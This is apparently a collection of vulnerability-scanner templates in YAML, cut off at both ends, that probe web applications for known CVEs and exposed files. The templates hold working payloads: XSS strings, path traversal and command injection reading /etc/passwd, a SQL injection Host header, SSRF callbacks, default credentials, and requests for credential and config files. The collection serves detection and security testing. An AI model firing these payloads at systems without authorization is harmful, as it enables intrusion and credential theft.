 6 |   description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
 7 |   reference:
 8 |     - https://cwiki.apache.org/confluence/display/WW/S2-059
 9 |     - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability
10 |   severity: high
11 |   tags: struts,rce,cve,cve2019
12 | 
13 | requests:
14 |   - method: GET
15 |     path:
16 |       - "{{BaseURL}}/?id=nuclei%25{128*128}"
17 | 
18 |     matchers:
19 |       - type: word
20 |         words:
21 |           - "nuclei16384"
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-19908.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-19908
 2 | info:
 3 |   name: phpMyChat-Plus XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       plus/pass_reset.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "<script>alert(1337)</script>") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/19908
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/esmtprc.yaml:
--------------------------------------------------------------------------------
 1 | id: esmtprc
 2 | 
 3 | info:
 4 |   name: esmtprc dotfile
 5 |   author: geeknik
 6 |   description: esmtp configuration file
 7 |   reference: https://linux.die.net/man/5/esmtprc
 8 |   severity: high
 9 |   tags: esmtp,config
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/.esmtprc"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         part: header
20 |         words:
21 |           - "text/plain"
22 |       - type: word
23 |         part: body
24 |         words:
25 |           - "hostname"
26 |           - "username"
27 |           - "password"
28 |         condition: and
29 |       - type: status
30 |         status:
31 |           - 200
32 | 


--------------------------------------------------------------------------------
/nuclei_pocs/pmb-directory-traversal.yaml:
--------------------------------------------------------------------------------
 1 | id: pmb-directory-traversal
 2 | 
 3 | info:
 4 |   name: PMB 5.6 Directory Traversal
 5 |   reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
 6 |   author: geeknik
 7 |   severity: medium
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
13 |       - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: regex
18 |         regex:
19 |           - "root:[x*]:0:0:"
20 |       - type: status
21 |         status:
22 |           - 200
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-5412.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-5412
 2 | info:
 3 |   name: Spring Cloud SSRF
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       proxy.stream
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?origin=http://burpcollaborator.net/
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resHeaders", "Jelly") && StringSearch("resBody", 'Burp Collaborator Server')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/5412
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/lutron-iot-default-login.yaml:
--------------------------------------------------------------------------------
 1 | id: lutron-iot-default-login
 2 | 
 3 | info:
 4 |   name: Lutron IOT Device Default Login
 5 |   reference: https://www.lutron.com
 6 |   author: geeknik
 7 |   severity: high
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/login?login=lutron&password=lutron"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - "<TITLE>LUTRON</TITLE>"
19 |           - ">DeviceIP</A>"
20 |           - ">Get Database Info as XML</A>"
21 |         condition: and
22 |       - type: word
23 |         part: header
24 |         words:
25 |           - "text/html"
26 |       - type: status
27 |         status:
28 |           - 200
29 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-11510.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-11510
 2 | info:
 3 |   name: Pulse Connect Secure SSL VPN Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       dana-na/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/11510
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-16662.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-16662
 2 | info:
 3 |   name: rConfig RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       install/lib/ajaxHandlers/ajaxServerSettingsChk.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/16662
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-7209.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-7209
 2 | info:
 3 |   name: LinuxKI Toolset RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       linuxki/experimental/vis/kivis.php
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/7209
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/nginx-vhost-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: nginx-vhost-xss
 2 | info:
 3 |   name: Nginx Vhost RXSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - stats: |
11 |       nginx-status.html
12 |       status.html
13 |       _zstats
14 | requests:
15 |   - method: GET
16 |     redirect: false
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     url: >-
20 |      {{.root}}/{{.stats}}"-prompt(1)-"
21 |     detections:
22 |       - >-
23 |         StatusCode() == 200 && StringSearch("response", "nginx vhost traffic") && StringSearch("response", "-prompt(1)-")
24 | 
25 | reference:
26 |   - author: j3ssie


--------------------------------------------------------------------------------
/nuclei_pocs/sftp-config.yaml:
--------------------------------------------------------------------------------
 1 | id: sftp-config
 2 | 
 3 | info:
 4 |   name: sftp password exposure
 5 |   author: geeknik
 6 |   reference: https://blog.sucuri.net/2012/11/psa-sftpftp-password-exposure-via-sftp-config-json.html
 7 |   severity: high
 8 |   tags: sftp,config,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/sftp-config.json"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "application/json"
21 |       - type: word
22 |         words:
23 |           - "host\":"
24 |           - "user\":"
25 |           - "sftp"
26 |         condition: and
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-2199.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-2199
 2 | info:
 3 |   name: Jenkins Subversion Partial Release Manager XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'jenkins'
11 | 
12 | requests:
13 |   - method: GET
14 |     redirect: false
15 |     url: >-
16 |       {{.root}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:<s>zie
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", "java.lang.") && StringSearch("response", 'For input string: "<s>zie"')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/2199


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-24223.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-24223
 2 | info:
 3 |   name: Mara CMS Reflective XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       contact.php
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", '"><script>alert(document.domain)</script>')
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/24223
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-7473.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-7473
 2 | info:
 3 |   name: Citrix ShareFile StorageZones Path Traversal
 4 |   risk: Potential
 5 |   confidence: Tentative
 6 | 
 7 | params:
 8 |   - root: "{{.BaseURL}}"
 9 | 
10 | requests:
11 |   - method: GET
12 |     redirect: false
13 |     url: >-
14 |       {{.root}}//XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri
15 |     headers:
16 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
17 |     detections:
18 |       - >-
19 |         StatusCode() == 200 && StringSearch('body', 'bit app support') && StringSearch('body', 'extensions')
20 | 
21 | references:
22 |   - https://www.cvebase.com/cve/2020/7473
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2021-33904.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2021-33904
 2 | 
 3 | info:
 4 |   name: Accela Civic Platform 21.1 - 'servProvCode' XSS
 5 |   author: geeknik
 6 |   description:
 7 |   reference: https://www.exploit-db.com/exploits/49980
 8 |   severity: medium
 9 |   tags: cve,cve2021,accela,xss
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}//security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm({{randstr}})%5e%22a2pbrnzx5a9"
15 | 
16 |     matchers-condition: and
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "text/html"
21 |       - type: word
22 |         part: header
23 |         words:
24 |           - 'k3woq"^confirm({{randstr}})^"a2pbrnzx5a9'
25 |         condition: and
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/apache-druid-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: apache-druid-unauth
 2 | info:
 3 |   name: Apache Druid unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: POST
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/druid/v2/sql
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |       - Content-Type: application/json
17 |     body: |
18 |       {"query":"SELECT 1337","context":{"timeout":2000}}
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("response", '[{"EXPR$0":1337}]') && StringSearch("resHeaders", "application/json")
22 | 
23 | references:
24 |   - repo: https://github.com/apache/druid/


--------------------------------------------------------------------------------
/nuclei_pocs/ftpconfig.yaml:
--------------------------------------------------------------------------------
 1 | id: ftpconfig
 2 | 
 3 | info:
 4 |   name: Atom remote-ssh ftpconfig
 5 |   author: geeknik
 6 |   description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
 7 |   severity: high
 8 |   tags: atom,ftp,config
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.ftpconfig"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/plain"
21 |       - type: status
22 |         status:
23 |           - 200
24 |       - type: word
25 |         words:
26 |           - "protocol"
27 |           - "host"
28 |           - "port"
29 |           - "user"
30 |         condition: and
31 | 


--------------------------------------------------------------------------------
/nuclei_pocs/sap-directory-listing.yaml:
--------------------------------------------------------------------------------
 1 | id: sap-directory-listing
 2 | info:
 3 |   name: SAP Directory Listing
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | variables:
10 |   - prefix: |
11 |       /
12 |       /sap/
13 |   - path: |
14 |       irj/go/km/navigation/
15 | requests:
16 |   - method: GET
17 |     redirect: false
18 |     url: >-
19 |       {{.root}}{{.prefix}}{{.path}}
20 |     headers:
21 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 |     detections:
23 |       - >-
24 |         StatusCode() == 200 && StringSearch("response", "~system") && StringSearch("response", "Changed") && StringSearch("response", ".webdav.")
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-18326.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-18326
 2 | info:
 3 |   name: DotNetNuke Cookie Deserialization Probing (CVE-2018-18326 CVE-2018-18325 CVE-2018-15812 CVE-2018-15811 CVE-2017-9822)
 4 |   risk: Potential
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/__
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
15 |     detections:
16 |       - >-
17 |         StatusCode() == 404 && !StringSearch("body", "Server Error") && ContentLength() > 1600 && StringSearch("body", "dnn_dnn")
18 | references:
19 |   - links:
20 |       - https://www.exploit-db.com/exploits/44414
21 |       - https://hackerone.com/reports/876708


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-19386.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-19386
 2 | info:
 3 |   name: Solarwinds DB Performance Analyzer XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       iwc/idcStateError.iwc
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?page=javascript%3aalert(document.domain)%2f%2f
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "<a href="javascript:alert(document.domain)//") 
21 | references:
22 |   - https://www.cvebase.com/cve/2018/19386
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-2894.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2018-2894
 2 | 
 3 | info:
 4 |   name: Oracle WebLogic RCE
 5 |   author: geeknik
 6 |   description: Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
 7 |   reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
 8 |   severity: critical
 9 |   tags: cve,cve2018,oracle,weblogic,rce
10 | 
11 | requests:
12 |   - method: GET
13 |     path:
14 |       - "{{BaseURL}}/ws_utc/config.do"
15 | 
16 |     redirects: true
17 |     matchers:
18 |       - type: word
19 |         words:
20 |           - "* Copyright (c) 2005,2013, Oracle"
21 |           - "<title>settings</title>"
22 |         conditon: and


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-14974.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-14974
 2 | info:
 3 |   name: SugarCRM XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       mobile/error-not-supported-platform.html
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?desktop_url=javascript:alert(1337);//itms://
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", 'url = window.location.search.split("?desktop_url=")[1]')
21 | references:
22 |   - https://www.cvebase.com/cve/2019/14974
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/selea-ip-camera.yaml:
--------------------------------------------------------------------------------
 1 | id: selea-ip-camera
 2 | info:
 3 |   name: Detect Selea Targa IP OCR-ANPR Camera
 4 |   author: geeknik
 5 |   description: Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure -- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php
 6 |   severity: info
 7 |   tags: iot
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         part: header
18 |         words:
19 |           - "SeleaCPSHttpServer"
20 |       - type: word
21 |         part: body
22 |         words:
23 |           - "Selea CarPlateServer"
24 |       - type: status
25 |         status:
26 |           - 200
27 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-14696.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-14696
 2 | info:
 3 |   name: Open-School XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       index.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |         {{.root}}/{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "<script>alert(document.domain)</script>")
21 | references:
22 |   - https://www.cvebase.com/cve/2019/14696
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-16952.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-16952
 2 | info:
 3 |   name: Microsoft SharePoint RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         (StatusCode() == 200 || StatusCode() == 201) && StringSearch("resHeaders", "MicrosoftSharePointTeamServices") && (RegexSearch("resBody", "15\\.0\\.0\\.(4571|5275|4351|5056)") || RegexSearch("resBody", "16\\.0\\.0\\.(10337|10364|10366)"))
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/16952
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-5284.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-5284
 2 | info:
 3 |   name: Next.js Path Traversal
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       _next/static/
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}_next/static/../server/pages-manifest.json
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resHeaders", 'application/json') && RegexSearch("resBody", '\{"/_app":".*?_app\.js"')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/5284
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-8115.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-8115
 2 | info:
 3 |   name: Revive Adserver XSS
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       www/delivery/afr.php
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && RegexSearch("resBody", '(?mi)window\.location\.replace\(".*alert\(1337\)')
22 | 
23 | references:
24 |   - https://www.cvebase.com/cve/2020/8115
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/gloo-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: gloo-unauth
 2 | info:
 3 |   name: Gloo UI Unauthentication
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: POST
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |       - Content-type: application/grpc-web+proto
17 |       - Referer: '{{.root}}/admin/'
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resHeader", 'application/grpc-web+proto') && StringSearch("body", 'gke-remote')
21 | 
22 | references:
23 |   - repo: https://github.com/containous/traefik
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/gmail-api-client-secrets.yaml:
--------------------------------------------------------------------------------
 1 | id: gmail-api-client-secrets
 2 | 
 3 | info:
 4 |   name: GMail API client_secrets.json
 5 |   author: geeknik
 6 |   severity: info
 7 |   description: https://developers.google.com/gmail/api/auth/web-server
 8 |   tags: config,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/client_secrets.json"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "client_id"
20 |           - "auth_uri"
21 |           - "token_uri"
22 |         condition: and
23 |       - type: status
24 |         status:
25 |           - 200
26 |       - type: word
27 |         part: header
28 |         words:
29 |           - "application/json"
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/joomla-lfi-comfabrik.yaml:
--------------------------------------------------------------------------------
 1 | id: joomla-lfi-comfabrik
 2 | info:
 3 |   name: Joomla LFI comfabrik
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}/index.php"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("response", '[{"value"') && StringSearch("response", '"disable":false')
19 | 
20 | reference:
21 |   - link: https://www.exploit-db.com/exploits/48263


--------------------------------------------------------------------------------
/nuclei_pocs/pyramid-debug-toolbar.yaml:
--------------------------------------------------------------------------------
 1 | id: pyramid-debug-toolbar
 2 | info:
 3 |   name: Pyramid Debug Toolbar
 4 |   author: geeknik
 5 |   description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application.
 6 |   reference: https://github.com/Pylons/pyramid_debugtoolbar
 7 |   severity: medium
 8 |   tags: pyramid,logs,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/_debug_toolbar/"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "<title>Pyramid Debug Toolbar</title>"
20 |           - "Pyramid DebugToolbar</a>"
21 |         condition: and
22 | 
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/redmine-db-config.yaml:
--------------------------------------------------------------------------------
 1 | id: redmine-db-config
 2 | info:
 3 |   name: Detect Redmine Database Configuration
 4 |   author: geeknik
 5 |   description: Redmine is a flexible project management web application written using Ruby on Rails framework - https://redmine.org/projects/redmine
 6 |   severity: medium
 7 |   tags: config,exposure
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}/config/database.yml"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         part: body
18 |         words:
19 |           - 'adapter:'
20 |           - 'database:'
21 |           - 'host:'
22 |           - 'production:'
23 |         condition: and
24 | 
25 |       - type: status
26 |         status:
27 |           - 200


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2014-2323.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2014-2323
 2 | 
 3 | info:
 4 |   name: lighttpd 1.4.34 SQL injection and path traversal
 5 |   description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
 6 |   reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
 7 |   author: geeknik
 8 |   severity: info
 9 |   tags: cve,cve2014,sqli,lighttpd
10 | 
11 | requests:
12 |   - raw:
13 |       - |
14 |         GET /etc/passwd HTTP/1.1
15 |         Host: [::1]' UNION SELECT '/
16 | 
17 |     unsafe: true
18 |     redirects: true
19 |     matchers:
20 |       - type: regex
21 |         regex:
22 |           - "root:[x*]:0:0:"
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-0929.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-0929
 2 | info:
 3 |   name: DotNetNuke ImageHandler SSRF (CVE-2017-0929)
 4 |   risk: Potential
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 |   - dest: "gcwyd66hvfkgc5ayfappvqbc93fv3k.burpcollaborator.net"
 9 | 
10 | # replicate:
11 | #   prefixes: 'REPORTSERVER, ReportServer'
12 | 
13 | requests:
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/DnnImageHandler.ashx?mode=file&url={{.dest}}
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && RegexSearch("body", "(?m)<html><body>[a-z0-9]+</body></html>")
22 | references:
23 |   - links:
24 |       - https://hackerone.com/reports/482634


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-16806.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2017-16806
 2 | 
 3 | info:
 4 |   name: Ulterius Server < 1.9.5.0 - Directory Traversal
 5 |   author: geeknik
 6 |   reference: https://www.exploit-db.com/exploits/43141
 7 |   severity: high
